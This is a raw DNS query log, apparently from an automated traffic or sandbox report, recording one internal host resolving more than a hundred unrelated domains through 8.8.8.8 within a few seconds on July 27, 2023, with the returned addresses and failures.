                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.935376883 CEST8.8.8.8192.168.2.40xec99No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.954904079 CEST8.8.8.8192.168.2.40xf032No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.954904079 CEST8.8.8.8192.168.2.40xf032No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.954904079 CEST8.8.8.8192.168.2.40xf032No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.979954958 CEST8.8.8.8192.168.2.40xab77Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.999496937 CEST8.8.8.8192.168.2.40x5ff0No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.010710955 CEST8.8.8.8192.168.2.40xf311No error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.012733936 CEST8.8.8.8192.168.2.40x15cbNo error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.064935923 CEST8.8.8.8192.168.2.40x64f8Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.081968069 CEST8.8.8.8192.168.2.40xe10eNo error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.088195086 CEST8.8.8.8192.168.2.40xc238No error (0)onzcda.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.088195086 CEST8.8.8.8192.168.2.40xc238No error (0)onzcda.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.118736029 CEST8.8.8.8192.168.2.40xda90No error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.133769989 CEST8.8.8.8192.168.2.40x6e9bNo error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.210741043 CEST8.8.8.8192.168.2.40xa5dfNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.212568998 CEST8.8.8.8192.168.2.40x2f3dNo error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.213838100 CEST8.8.8.8192.168.2.40x9a45No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.214157104 CEST8.8.8.8192.168.2.40x730No error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.214157104 CEST8.8.8.8192.168.2.40x730No error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.222096920 CEST8.8.8.8192.168.2.40x7777Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.251024961 CEST8.8.8.8192.168.2.40x2a5No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.255829096 CEST8.8.8.8192.168.2.40xe5f5No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.255829096 CEST8.8.8.8192.168.2.40xe5f5No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.255829096 CEST8.8.8.8192.168.2.40xe5f5No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.255829096 CEST8.8.8.8192.168.2.40xe5f5No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.270237923 CEST8.8.8.8192.168.2.40x606fNo error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.288331985 CEST8.8.8.8192.168.2.40x17b7No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.292938948 CEST8.8.8.8192.168.2.40x2cf9No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.299016953 CEST8.8.8.8192.168.2.40x1cbcNo error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.299057007 CEST8.8.8.8192.168.2.40xcbe5No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.299057007 CEST8.8.8.8192.168.2.40xcbe5No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.299057007 CEST8.8.8.8192.168.2.40xcbe5No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.299057007 CEST8.8.8.8192.168.2.40xcbe5No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.309627056 CEST8.8.8.8192.168.2.40x1037No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.309627056 CEST8.8.8.8192.168.2.40x1037No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.311115026 CEST8.8.8.8192.168.2.40x61beName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.327250957 CEST8.8.8.8192.168.2.40x9No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.330481052 CEST8.8.8.8192.168.2.40xa432Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.331675053 CEST8.8.8.8192.168.2.40xad72No error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.331675053 CEST8.8.8.8192.168.2.40xad72No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.331675053 CEST8.8.8.8192.168.2.40xad72No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.331675053 CEST8.8.8.8192.168.2.40xad72No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.337816000 CEST8.8.8.8192.168.2.40x7661Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.343575954 CEST8.8.8.8192.168.2.40xad29Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.355858088 CEST8.8.8.8192.168.2.40xb4b2Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.380930901 CEST8.8.8.8192.168.2.40x1bf2Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.391827106 CEST8.8.8.8192.168.2.40x2a63No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.394145012 CEST8.8.8.8192.168.2.40x6964No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.394145012 CEST8.8.8.8192.168.2.40x6964No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.394145012 CEST8.8.8.8192.168.2.40x6964No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.394145012 CEST8.8.8.8192.168.2.40x6964No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.424128056 CEST8.8.8.8192.168.2.40xfee2No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.447000980 CEST8.8.8.8192.168.2.40x8754Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.481015921 CEST8.8.8.8192.168.2.40x774bNo error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.485208988 CEST8.8.8.8192.168.2.40x1f20No error (0)sigtoa.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.485208988 CEST8.8.8.8192.168.2.40x1f20No error (0)sigtoa.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.517420053 CEST8.8.8.8192.168.2.40xb00dNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.549385071 CEST8.8.8.8192.168.2.40x4fNo error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.561331987 CEST8.8.8.8192.168.2.40xb157Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.590720892 CEST8.8.8.8192.168.2.40x395fServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.597835064 CEST8.8.8.8192.168.2.40x1cbdName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.609666109 CEST8.8.8.8192.168.2.40x6e14No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.614898920 CEST8.8.8.8192.168.2.40xec48Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.631263971 CEST8.8.8.8192.168.2.40x35d2Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.662245035 CEST8.8.8.8192.168.2.40xf1aaName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.664078951 CEST8.8.8.8192.168.2.40xb432No error (0)shesfit.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.664078951 CEST8.8.8.8192.168.2.40xb432No error (0)shesfit.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.694042921 CEST8.8.8.8192.168.2.40xe2dbNo error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.738473892 CEST8.8.8.8192.168.2.40x4168Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.757834911 CEST8.8.8.8192.168.2.40x5e2dNo error (0)dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.757834911 CEST8.8.8.8192.168.2.40x5e2dNo error (0)dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.766067028 CEST8.8.8.8192.168.2.40x552fNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.778426886 CEST8.8.8.8192.168.2.40x87e9No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.785823107 CEST8.8.8.8192.168.2.40xf26cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.790973902 CEST8.8.8.8192.168.2.40xe1f5No error (0)yhsll.com102.134.49.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.799974918 CEST8.8.8.8192.168.2.40xde15No error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.836926937 CEST8.8.8.8192.168.2.40xd85bNo error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.880284071 CEST8.8.8.8192.168.2.40xf432Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.887940884 CEST8.8.8.8192.168.2.40x8dbeNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.891674995 CEST8.8.8.8192.168.2.40xb45bNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.891674995 CEST8.8.8.8192.168.2.40xb45bNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.891881943 CEST8.8.8.8192.168.2.40xa7eaNo error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.891881943 CEST8.8.8.8192.168.2.40xa7eaNo error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.891881943 CEST8.8.8.8192.168.2.40xa7eaNo error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.895973921 CEST8.8.8.8192.168.2.40x1f1cNo error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.895973921 CEST8.8.8.8192.168.2.40x1f1cNo error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.915580034 CEST8.8.8.8192.168.2.40x9441No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.956590891 CEST8.8.8.8192.168.2.40x8d5dNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.977252007 CEST8.8.8.8192.168.2.40x404dNo error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.037533998 CEST8.8.8.8192.168.2.40xb615Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.078576088 CEST8.8.8.8192.168.2.40x3dd6No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.078576088 CEST8.8.8.8192.168.2.40x3dd6No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.085484028 CEST8.8.8.8192.168.2.40x2166No error (0)bount.com.tw188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.085484028 CEST8.8.8.8192.168.2.40x2166No error (0)bount.com.tw188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.095892906 CEST8.8.8.8192.168.2.40xd310No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.105021954 CEST8.8.8.8192.168.2.40xc4f6Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.106302977 CEST8.8.8.8192.168.2.40xcc1No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.143347025 CEST8.8.8.8192.168.2.40x3852Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.147793055 CEST8.8.8.8192.168.2.40xec81No error (0)mjrcpas.com204.11.56.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.154577971 CEST8.8.8.8192.168.2.40xb051No error (0)dspears.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.154577971 CEST8.8.8.8192.168.2.40xb051No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.154577971 CEST8.8.8.8192.168.2.40xb051No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.154577971 CEST8.8.8.8192.168.2.40xb051No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.169246912 CEST8.8.8.8192.168.2.40x1541No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.201613903 CEST8.8.8.8192.168.2.40x6730No error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.244333982 CEST8.8.8.8192.168.2.40x928eNo error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.253979921 CEST8.8.8.8192.168.2.40xa941No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.255357981 CEST8.8.8.8192.168.2.40x2e40No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.267297029 CEST8.8.8.8192.168.2.40xb71No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.271353960 CEST8.8.8.8192.168.2.40xfe36No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.271353960 CEST8.8.8.8192.168.2.40xfe36No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.296885014 CEST8.8.8.8192.168.2.40xb0afServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.299643993 CEST8.8.8.8192.168.2.40xaf11No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.304085016 CEST8.8.8.8192.168.2.40x5218No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.343338013 CEST8.8.8.8192.168.2.40xff77No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.416439056 CEST8.8.8.8192.168.2.40x3af3Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.443228006 CEST8.8.8.8192.168.2.40x1029No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.468302965 CEST8.8.8.8192.168.2.40x96f2No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.490952015 CEST8.8.8.8192.168.2.40xd252No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.490952015 CEST8.8.8.8192.168.2.40xd252No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.501367092 CEST8.8.8.8192.168.2.40x1668No error (0)shesfit.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.501367092 CEST8.8.8.8192.168.2.40x1668No error (0)shesfit.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.544017076 CEST8.8.8.8192.168.2.40xe972No error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.544017076 CEST8.8.8.8192.168.2.40xe972No error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.591532946 CEST8.8.8.8192.168.2.40x228bName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.625814915 CEST8.8.8.8192.168.2.40x8e48Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.645879030 CEST8.8.8.8192.168.2.40xf882No error (0)hyab.se188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.645879030 CEST8.8.8.8192.168.2.40xf882No error (0)hyab.se188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.649317980 CEST8.8.8.8192.168.2.40xabe8Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.753359079 CEST8.8.8.8192.168.2.40x864cNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.766130924 CEST8.8.8.8192.168.2.40x9650No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.790352106 CEST8.8.8.8192.168.2.40x99d0No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.827857971 CEST8.8.8.8192.168.2.40x4f5bNo error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.915326118 CEST8.8.8.8192.168.2.40xcd92Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.935174942 CEST8.8.8.8192.168.2.40x4f1dNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.935174942 CEST8.8.8.8192.168.2.40x4f1dNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.936430931 CEST8.8.8.8192.168.2.40x4c67Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.950079918 CEST8.8.8.8192.168.2.40xef13No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.964459896 CEST8.8.8.8192.168.2.40x37fbNo error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.964459896 CEST8.8.8.8192.168.2.40x37fbNo error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.970443964 CEST8.8.8.8192.168.2.40x4704No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.990359068 CEST8.8.8.8192.168.2.40xe93dNo error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.991954088 CEST8.8.8.8192.168.2.40x4399Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.995233059 CEST8.8.8.8192.168.2.40x62beNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.999484062 CEST8.8.8.8192.168.2.40xfaacNo error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.999484062 CEST8.8.8.8192.168.2.40xfaacNo error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.012660027 CEST8.8.8.8192.168.2.40xaa53No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.015007019 CEST8.8.8.8192.168.2.40x4150Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.016200066 CEST8.8.8.8192.168.2.40x33fbNo error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.048990965 CEST8.8.8.8192.168.2.40xce6Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.101268053 CEST8.8.8.8192.168.2.40x68dfNo error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.163909912 CEST8.8.8.8192.168.2.40x3af3Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.169965029 CEST8.8.8.8192.168.2.40x9093No error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.169965029 CEST8.8.8.8192.168.2.40x9093No error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.193052053 CEST8.8.8.8192.168.2.40x4381No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.193052053 CEST8.8.8.8192.168.2.40x4381No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.203223944 CEST8.8.8.8192.168.2.40xf638No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.217984915 CEST8.8.8.8192.168.2.40xa3c0No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.217984915 CEST8.8.8.8192.168.2.40xa3c0No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.223258018 CEST8.8.8.8192.168.2.40xd2f8Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.260977030 CEST8.8.8.8192.168.2.40xfd30No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.261061907 CEST8.8.8.8192.168.2.40x660No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
